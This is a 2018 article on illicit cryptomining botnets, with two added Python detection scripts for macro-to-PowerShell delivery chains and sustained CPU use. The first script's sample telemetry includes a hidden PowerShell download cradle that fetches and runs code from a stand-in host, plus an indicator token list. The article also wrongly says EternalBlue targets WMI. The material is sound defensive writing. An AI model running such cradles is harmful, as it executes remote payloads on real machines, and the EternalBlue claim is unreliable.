Top Cyberthreat Of 2018: Illicit Cryptomining


Ransomware is oh, so 2017. Today, all the smart hackers have turned to illicit cryptomining to fill their coffers.

Due to a combination of a leaked NSA hack, a cryptocurrency more anonymous than Bitcoin, and benign cryptocurrency transaction processing (aka ‘mining’) software that requires no command and control link back to the attacker, we now have the perfect combination of easy money, slim chance of detection, and billions of unsuspecting targets that may not even care they’ve been hacked.

Criminals around the world are rejoicing, still incredulous at how easy it is to make money while they sleep.


Assembling the Pieces of the ‘Perfect Crime’

In early 2017, a hacker group released into the wild a number of NSA-created hacks including EternalBlue, which made it dead simple to crack open Microsoft Windows.

Meanwhile, cryptocurrency advocates unhappy with Bitcoin’s lack of true anonymity developed Monero, an altcoin better able to hide the tracks of criminal transactions. Guess what? Criminals love it.

The third component of this nefarious enterprise: the fact that all blockchain-based systems leverage distributed transaction processors known as miners, who automatically receive a payment for their efforts in whatever cryptocurrency they choose to process.

Sulfur – saltpeter – charcoal – and bam! The global hacker community just invented gunpowder: the ability to surreptitiously install illicit Monero miners on unsuspecting computers around the world.

Windows servers. Laptops. Android devices. Even IoT endpoints. All of them making money for the bad guys every minute, day and night – any bad guys, really, but most noticeably Russian and Chinese organized crime syndicates.

And you may have no idea you’ve been hacked, other than occasional performance slowdowns and higher electric bills. No ransom notes. No stolen files of passwords or credit card numbers. You may not even be able to convince anybody there’s a problem.

Unraveling the Threat

The most pernicious aspect of illicit cryptomining is how well it flies under the radar of its victims. “In this new business model, attackers are no longer penalizing victims for opening an attachment, or running a malicious script by taking systems hostage and demanding a ransom,” explain Nick Biasini, Outreach Engineer; Edmund Brumaghin, Threat Researcher; Warren Mercer, Technical Leader; Josh Reynolds, Information Security Analyst; Azim Khodijbaev, Senior Threat Intelligence Analyst; and David Liebenberg, Senior Threat Analyst; all at the Cisco Systems Talos threat intelligence division (the ‘Talos team’). “Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining.”

This attack vector is both profitable and easy to mount – a dangerous combination. “The increase in purchasing power and liquidity is driving valuations, as well as volatility, higher than ever before,” say Ryan McCombs, Senior Consultant; Jason Barnes, Senior Consultant; Karan Sood, Senior Security Researcher; and Ian Barton, Consultant; all at CrowdStrike (the ‘CrowdStrike team’). “Naturally, where there are profits to be had, crime is not far behind.”

As a result, illicit cryptomining is rapidly replacing ransomware as the attack vector of choice, especially as cybersecurity vendors bring ransomware protection to market. “What we’re looking at from a near and potentially long-term perspective is the value of a computer that has just a regular old CPU might be more just leaving it quietly running some cryptocurrency miner rather than infecting it with ransomware or some other software that might steal data,” explains Ryan Olson, Intelligence Director at Palo Alto Networks.

Building a Botnet

Large numbers of compromised systems working in concert, known as botnets, are a common hacker tool: they can mount distributed denial of service attacks and various other attacks that require massive amounts of coordinated transaction processing.

In the case of illicit cryptomining, however, each node works independently of the others. Criminals simply need to install many miners because each miner only generates a relatively small amount of money. “Talos has observed botnets consisting of millions of infected systems, which…means that these systems could be leveraged to generate more than $100 million per year theoretically,” the Talos team continues. “This is all done with minimal effort following the initial infection. More importantly, with little chance of being detected, this revenue stream can continue in perpetuity.”

There are, in fact, several different exploits that lead to different families of botnets. Perhaps the most pernicious has been dubbed Smominru. “Proofpoint researchers have been tracking the massive Smominru botnet, the combined computing power of which has earned millions of dollars for its operators,” explains Sandiford Oliver, Cybersecurity Researcher for Proofpoint, who goes by the pseudonym Kafeine. “Given the significant profits available to the botnet operators and the resilience of the botnet and its infrastructure, we expect these activities to continue, along with their potential impacts on infected nodes.”

Smominru leverages the EternalBlue exploit from the NSA, which targets Windows Management Infrastructure (WMI). The attacker typically mounts a phishing attack with a Microsoft Word file attachment. Once the target opens the file, it runs a Word macro that executes a Visual Basic script, which in turn runs a Microsoft PowerShell script that downloads and installs the miner executable.

Another popular cryptomining worm that leverages WMI weaknesses is WannaMine. “CrowdStrike has observed more sophisticated capabilities built into a cryptomining worm dubbed WannaMine,” says the CrowdStrike team. “Its fileless nature and use of legitimate system software such as WMI and PowerShell make it difficult, if not impossible, for organizations to block it without some form of next-generation antivirus.”

WMI, however, isn’t the only vulnerability. Some researchers report attacks via Microsoft SQL Server and Oracle WebLogic, and just last month an attack vector that targets Google Android devices by scanning for open debug ports came on the scene.
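The two delivery patterns described above, the Word macro to script host to PowerShell download chain behind Smominru and the fileless WMI-and-PowerShell pattern attributed to WannaMine, both leave a distinctive parent/child process trail that endpoint telemetry can catch even when the miner binary itself is never written to disk. The following is an added detection example written for this article, not code from Talos, CrowdStrike, Proofpoint or any vendor mentioned here. It assumes a simplified, constructed Sysmon-style process-creation record (pid, parent pid, image name, command line); the sample events are constructed and the token list is an assumption to be tuned against your own baseline.

```python
"""Flag shells whose ancestry matches the macro-to-miner delivery chains
described in the article (hypothetical example over constructed telemetry)."""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # lowercase executable name, as a simplified Sysmon-style field
    cmdline: str


# Constructed sample telemetry (not real logs): an Office document spawning a
# script host, which spawns PowerShell with a download cradle, plus a shell
# spawned by the WMI provider host with an encoded command, plus benign use.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "winword.exe", "winword.exe /n invoice.docx"),
    ProcEvent(300, 200, "wscript.exe", "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\x.vbs"),
    ProcEvent(400, 300, "powershell.exe",
              "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/m.ps1')"),
    ProcEvent(500, 1, "svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent(600, 500, "wmiprvse.exe", "wmiprvse.exe -secured -Embedding"),
    ProcEvent(700, 600, "powershell.exe", "powershell.exe -enc SQBFAFgA"),
    ProcEvent(800, 100, "powershell.exe", "powershell.exe Get-Process"),  # benign admin use
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumed indicator tokens for download cradles and hidden/encoded invocation.
SUSPICIOUS_PS = ("downloadstring", "downloadfile", "-enc", "-encodedcommand",
                 "iex ", "invoke-expression", "-w hidden", "-windowstyle hidden")


def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent], max_depth: int = 8) -> List[str]:
    """Return the image names of ev's ancestors, nearest parent first."""
    chain: List[str] = []
    cur = by_pid.get(ev.ppid)
    while cur is not None and len(chain) < max_depth:
        chain.append(cur.image)
        cur = by_pid.get(cur.ppid)
    return chain


def classify(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, reason) for every shell whose lineage or command line
    matches one of the delivery patterns. Rules are checked most-specific first."""
    by_pid = {e.pid: e for e in events}
    findings: List[Tuple[int, str]] = []
    for e in events:
        if e.image not in SHELLS:
            continue
        parents = ancestry(e, by_pid)
        cmd = e.cmdline.lower()
        suspicious_cmd = any(tok in cmd for tok in SUSPICIOUS_PS)
        if any(p in OFFICE for p in parents) and any(p in SCRIPT_HOSTS for p in parents):
            findings.append((e.pid, "office->script-host->shell chain"))
        elif "wmiprvse.exe" in parents and suspicious_cmd:
            findings.append((e.pid, "WMI-spawned shell with encoded/download command"))
        elif suspicious_cmd:
            findings.append((e.pid, "shell with download cradle or encoded command"))
    return findings


if __name__ == "__main__":
    for pid, reason in classify(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

The first rule keys on lineage alone, because a shell descended from an Office process through a script host is rarely legitimate regardless of its arguments; the WMI rule additionally requires a suspicious command line, since wmiprvse.exe legitimately launches management scripts. The benign administrator invocation (pid 800) produces no finding.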

Show Me the Money

The linchpin that holds the entire nefarious enterprise together is the anonymous cryptocurrency Monero. “Bitcoin alternatives like Monero and Ethereum continue their overall upward trend in value,” Oliver continues, “putting them squarely in the crosshairs of threat actors looking for quick profits and anonymous transactions.”

While other cryptocurrencies play a factor, Monero is shaping up to be the favorite. “This Monero mining botnet is extremely large, made up mostly of Microsoft Windows servers spread around the globe,” says Kevin Epstein, VP of Proofpoint’s Threat Operations Center. “We repeatedly see threat actors ‘follow the money’ - over the last several months, the money has been in cryptocurrency and actors are turning their attention to a variety of illicit means to obtain both Bitcoins and alternatives.”

Oliver seconds this point. “In the last year, we have observed standalone coin miners and coin mining modules in existing malware proliferate rapidly,” he says. “As Bitcoin has become prohibitively resource-intensive to mine outside of dedicated mining farms, interest in Monero has increased dramatically.”

The combination of simple botnets and anonymous cryptocurrency has led to an explosion of illicit activity. “Cryptocurrency miner payloads could be among some of the easiest money makers available for attackers,” the Talos team adds. “There is no need to attempt to compromise hosts to steal documents, passwords, wallets, private keys, as we’ve grown accustomed to seeing from financially motivated attackers.”

Flying Under the Radar

Contrasted with the business-sinking direct assault of ransomware, illicit cryptomining is downright benign. “It’s largely unnoticed by the majority of users,” the Talos team says. “There isn’t any command and control activity and it generates revenue consistently until it’s removed.”

Command and control is a term for how hackers must ‘phone home’ once they find their target in order to exfiltrate the goods – a step that is no longer necessary in the case of illicit cryptomining. The miner software must simply have the anonymized code representing the attacker’s cryptowallet.

What, then, is actually being stolen? “Attackers are not stealing anything more than computing power from their victims, and the mining software isn’t technically malware,” the Talos team continues. “So theoretically, the victims could remain part of the adversary’s botnet for as long as the attacker chooses.”

However, stealing computing power (and its requisite electricity) isn’t entirely benign. “While cryptocurrency mining has typically been viewed as a nuisance, CrowdStrike has recently seen several cases where mining has impacted business operations,” the CrowdStrike team adds, “rendering some companies unable to operate for days and weeks at a time.”

Proofpoint agrees. “Because most of the nodes in this botnet appear to be Windows servers, the performance impact on potentially critical business infrastructure may be high, as can the cost of increased energy usage by servers running much closer to capacity,” Oliver says.
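Because a miner has no command and control traffic to watch for, the symptom the article keeps returning to, a host running near capacity for long stretches, is often the only signal a victim has. The following is an added example, written for this article rather than taken from any of the vendors quoted, of turning per-process CPU telemetry into an alert: it looks for a process outside a known-heavy baseline that stays above a CPU threshold for a sustained run. The sample telemetry is constructed, and the threshold, window and baseline are assumptions to tune per host role.

```python
"""Flag processes that keep a host near CPU capacity for a sustained period
(hypothetical example over constructed per-process CPU samples)."""
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

# Constructed samples: (timestamp_seconds, process_name, cpu_percent),
# one sample per process every 60 s over 10 minutes.
SAMPLES: List[Tuple[int, str, float]] = []
for i in range(10):
    t = i * 60
    SAMPLES.append((t, "sqlservr.exe", 35.0 + (i % 3) * 5))       # legitimate, bursty
    SAMPLES.append((t, "svchost.exe", 2.0))
    SAMPLES.append((t, "update.exe", 97.0 if i >= 2 else 0.5))    # unexpected, pegged

# Baseline processes that are allowed to run hot on this host role (assumed).
KNOWN_HEAVY: Set[str] = {"sqlservr.exe"}


def sustained_hogs(samples: Iterable[Tuple[int, str, float]],
                   cpu_threshold: float = 90.0,
                   min_seconds: int = 300,
                   allow: Set[str] = KNOWN_HEAVY) -> Dict[str, int]:
    """Return {process: longest contiguous run in seconds at or above
    cpu_threshold} for processes not on the allow list whose longest run
    lasts at least min_seconds. Run length is measured between the first and
    last sample of the run, so a single hot sample counts as zero seconds."""
    by_proc: Dict[str, List[Tuple[int, float]]] = defaultdict(list)
    for ts, name, cpu in sorted(samples):
        by_proc[name].append((ts, cpu))
    result: Dict[str, int] = {}
    for name, series in by_proc.items():
        if name in allow:
            continue
        longest = 0
        run_start = None
        for ts, cpu in series:
            if cpu >= cpu_threshold:
                if run_start is None:
                    run_start = ts
                longest = max(longest, ts - run_start)
            else:
                run_start = None
        if longest >= min_seconds:
            result[name] = longest
    return result


if __name__ == "__main__":
    for name, seconds in sustained_hogs(SAMPLES).items():
        print(f"{name}: above threshold for {seconds} s")
```

On the constructed data only update.exe trips the rule: it runs above 90% from the 120 s mark to the 540 s mark, a 420 s run, while the database engine is excluded by the baseline and svchost.exe never approaches the threshold. The allow list is what keeps this from paging on every batch job; in practice it should be derived per host role rather than hand-written.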

The Future of Illicit Cryptomining

While the fact that this cyberattack flies under the radar may seem benign, it’s actually the reason why this attack strategy is so dangerous. Unlike ransomware, where businesses demand rapid mitigation technology from software vendors, with illicit cryptomining, the attacks will be able to spread mostly unchecked.

Over time, we can thus expect compromised systems churning away at making money for criminals to reach epidemic proportions. At some point, criminals will increasingly step on each other’s toes, with multiple bad actors attempting to infect the same systems.

At that point, expect to see widespread ‘brownouts’ of computing power, as large swaths of the global computing infrastructure collapse under the weight of multiple botnets, each building the respective fortunes of criminal enterprises around the globe.

This problem is so pernicious, in fact, that software mitigation techniques may turn out to be insufficient to stop its spread. Instead, governments may simply have to pull the plug on cryptocurrency once and for all.

Intellyx publishes the Agile Digital Transformation Roadmap poster, advises companies on their digital transformation initiatives, and helps vendors communicate their agility stories. As of the time of writing, Microsoft is an Intellyx customer. None of the other organizations mentioned in this article are Intellyx customers. Image credit: public domain.
